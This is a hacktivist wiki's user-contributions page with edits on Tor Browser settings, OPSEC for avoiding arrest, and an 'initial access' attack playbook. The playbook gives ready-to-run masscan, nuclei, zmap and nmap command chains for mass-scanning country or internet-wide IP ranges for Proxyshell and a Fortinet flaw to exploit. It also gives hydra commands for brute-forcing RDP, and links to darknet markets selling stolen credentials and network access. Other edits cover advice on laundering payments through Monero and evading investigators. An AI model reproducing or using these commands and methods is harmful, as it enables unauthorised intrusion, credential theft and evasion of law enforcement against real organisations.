Enlace Hacktivista - User contributions [en]

Tor Browser Privacy Optimization

2025-09-18T19:40:52Z

Quetzalcoatl:

* Disable JavaScript. To do this, set Security Level to "Safest" in the Tor Browser settings.
* In "about:config" change "privacy.resistFingerprinting.spoofOsInUserAgentHeader" from "false" to "true" (note, [https://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/43189 this does not work AT ALL in the latest version of the Tor browser]).

Tor Browser Privacy Optimization

2025-09-18T19:35:43Z

Quetzalcoatl:

* Disable JavaScript. To do this, set Security Level to "Safest" in the Tor Browser settings.
* In "about:config" change "privacy.resistFingerprinting.spoofOsInUserAgentHeader" from "false" to "true" (note, this does not work AT ALL in the latest version of the Tor browser).

Opsec Measures

2025-09-18T19:34:56Z

Quetzalcoatl: /* OPSEC Tools */

== Recommended Measures ==
Here you will find resources that will help you from a technological operational security perspective. OPSEC is much more than simply what networks and technology you use.

Make sure that you use a separate and fully encrypted computer to work from. This can be a virtual machine, USB, external drive or a throw away laptop. All of your network traffic should be routed entirely over Tor (whonix is the best for this). See [https://enlacehacktivista.org/images/6/69/Hack_back1.txt Phineas Fishers operational security practices] for hackers OPSEC.

== OPSEC Tools ==
There is no silver bullet when it comes to protecting yourself, staying safe and anonymous. It's important to know how to use the tools we rely on to keep us safe and free. Below you will find industry standard tools that will help keep your hacktivity private and secure.

When communicating with journalists or other hackers it's important to keep all communication end-to-end encrypted, network connection over Tor and to [https://www.wired.com/2015/05/silk-road-2/ not use aliases or emails that lead back to your real world identity].

* https://www.qubes-os.org ([http://qubesosfasa4zl44o4tws22di6kepyzfeqv3tg4e3ztknltfxqrymdad.onion Tor])
* https://www.whonix.org ([http://www.dds6qkxpwdeubwucdiaord2xgbbeyds25rbsgr73tbfpqpt4a6vjwsyd.onion Tor])
* https://tails.net
* The whonix wiki has lots of great info on anonymity even if you're not using whonix: https://www.whonix.org/wiki/Documentation
* [https://www.whonix.org/wiki/Comparison_with_Others Custom]: https://gitlab.torproject.org/legacy/trac/-/wikis/doc/TransparentProxy
* Use veracrypt to encrypt your virtual machines and hard drive. Make sure to save your hacktivity inside of a [https://veracrypt.eu/en/Hidden%20Volume.html hidden volume] for plausible deniability. https://veracrypt.fr
* Tor browser: https://www.torproject.org ([http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/index.html Tor])
** See [[Tor Browser Privacy Optimization]]
* If you plan on transacting you should always start from monero and swap your XMR to another coin. This reduces traceability (over Tor) and will defeat standard blockchain investigations. https://www.getmonero.org ([http://monerotoruzizulg5ttgat2emf4d6fbmiea25detrmmy7erypseyteyd.onion/index.html Tor])

== Guides and Information ==
* [https://www.anarsec.guide/ AnarSec]
Interesting techniques for detecting [[wikipedia:Evil Maid attack|evil maid attacks]], along with lots of great information on Qubes, Tails, GrapheneOS and more.
* [https://www.notrace.how/ No Trace Project]
Mostly focused on surveillance of physical actions, but plenty is relevant for hacking. Hackers will need to watch out for physical frame grabbers and keyloggers in addition to [https://www.notrace.how/earsandeyes/ microphone and cameras], along with being mindful of [https://www.notrace.how/resources/read/who-wrote-that.html what they write.]

== Know your enemy ==
Cyber investigators will use many techniques to uncover your identity to facilitate in a successful arrest. Books as seen below help us see and understand some of the tactics they use, even trying to infiltrate groups to collect information.

'''Always be aware, know your enemy!'''

* (Book) Hunting Cyber Criminals: A Hacker's Guide to Online Intelligence Gathering Tools and Techniques 1st Edition
* (Book) Tracers in the Dark: The Global Hunt for the Crime Lords of Cryptocurrency

Tor Browser Privacy Optimization

2025-09-18T19:34:45Z

Quetzalcoatl: Created page with "* Disable JavaScript. To do this, set Security Level to "Safest" in the Tor Browser settings. * Change "privacy.resistFingerprinting.spoofOsInUserAgentHeader" from "false" to "true" (note, this does not work AT ALL in the latest version of the Tor browser)."

* Disable JavaScript. To do this, set Security Level to "Safest" in the Tor Browser settings.
* Change "privacy.resistFingerprinting.spoofOsInUserAgentHeader" from "false" to "true" (note, this does not work AT ALL in the latest version of the Tor browser).

Initial Access Tactics, techniques and procedures

2025-07-22T17:11:07Z

Quetzalcoatl: /* Services */

== Phishing ==
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.

==== Tools ====
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
* https://www.xanthus.io/mastering-the-simulated-phishing-attack
* https://github.com/Arno0x/EmbedInHTML
* https://github.com/L4bF0x/PhishingPretexts
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
* https://book.hacktricks.xyz/phishing-methodology
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* https://github.com/curtbraz/PhishAPI
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office

== Password Attacks ==
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.

=== Usernames ===
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.

* https://github.com/digininja/CeWL
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/sc0tfree/mentalist
* https://github.com/urbanadventurer/username-anarchy
* https://github.com/vysecurity/LinkedInt
* https://github.com/initstring/linkedin2username
* https://github.com/shroudri/username_generator

=== Passwords ===
Common and leaked credentials to test login portals and network services.

==== Default passwords ====
* https://cirt.net/passwords
* https://default-password.info
* https://datarecovery.com/rd/default-passwords
* https://github.com/ihebski/DefaultCreds-cheat-sheet

==== Common and leaked passwords ====
* https://wiki.skullsecurity.org/index.php?title=Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
* https://github.com/projectdiscovery/nuclei-templates/tree/main/helpers/wordlists

=== Password cracking tools ===

* https://github.com/byt3bl33d3r/SprayingToolkit
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/patator
* https://github.com/1N3/BruteX

=== Searching leaks ===
* https://github.com/khast3x/h8mail [Free but includes paid services]

==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''

You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

* https://haveibeenpwned.com
* https://stealerlo.gs/
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]

Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.

=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.

* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://github.com/blacklanternsecurity/TREVORspray
* https://github.com/knavesec/CredMaster
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper

=== Hash cracking ===
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!

==== Identify hash ====
* https://github.com/blackploit/hash-identifier

==== Online tools ====
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net

==== Offline tools ====
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules

== Buying access ==

You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]

You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])
* https://ramp4u.io [Free & Paid] ([http://rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd.onion Tor])

== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.

=== Networks ===

==== Vulnerability Scanning ====
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.

Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.

If the output from the scans is too large, then you can use the [https://linux.die.net/man/1/split split] command to break the output file up into smaller files and scan against those via multiple [https://linux.die.net/man/1/screen screen] windows/sessions to make your scanning more efficient.

* <code>split -l 10000 results.txt results_</code>

'''IP Ranges''':
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0

===== Proxyshell =====
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]

'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>

* <code>sed -i 's/$/:443/' results.txt</code>

*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>

Exploit Discovered hosts: [[Proxyshell]]

===== CVE-2018-13379 =====
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]

'''Tool''': [https://github.com/zmap/zmap zmap]

'''1.''' Scan for Microsoft Exchange E-mail Servers:
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
</pre>
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]
<pre>
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>

[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]

===== Domains =====
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.

See [[Domain Spray and Pray]] scanning.

==== Password Attacks ====
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.

===== RDP =====
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:
<br>
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code>

===== VPN =====
'''2.''' Virtual Private Network (VPN) Brute forcing:
<br>
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing

Exploitation

2025-07-22T17:08:51Z

Quetzalcoatl: /* Cross-site scripting (XSS) */

=== Payloads ===
* https://github.com/swisskyrepo/PayloadsAllTheThings
* https://github.com/payloadbox
* WAF bypass payloads: https://github.com/waf-bypass-maker/waf-community-bypasses

=== Metasploit ===
* Install on server: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

=== Public exploits ===
* https://www.kali.org/tools/exploitdb/#searchsploit

=== SQL injection (SQLi) ===
* https://github.com/sqlmapproject/sqlmap
* Tamper agent scripts for sqlmap (WAF bypass): https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423
* https://github.com/r0oth3x49/ghauri
* SQL Injection & XSS Playground: https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#classic-sql-injection

=== Cross-site scripting (XSS) ===
* https://github.com/hahwul/dalfox
* https://github.com/s0md3v/XSStrike
* https://github.com/mandatoryprogrammer/xsshunter
* https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground#xss

=== Command Injection ===
* https://github.com/commixproject/commix

=== SSRF ===
* https://github.com/swisskyrepo/SSRFmap